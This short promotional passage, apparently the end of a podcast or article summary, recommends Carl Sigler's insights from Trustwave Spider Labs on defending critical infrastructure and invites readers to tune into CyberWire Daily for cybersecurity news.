For those seeking to delve deeper into these topics, Carl Sigler’s insights from Trustwave Spider Labs offer valuable perspectives on defending critical infrastructure against sophisticated cyber threats.
Stay informed and secure by tuning into CyberWire Daily, your essential source for the latest in cybersecurity news and analysis.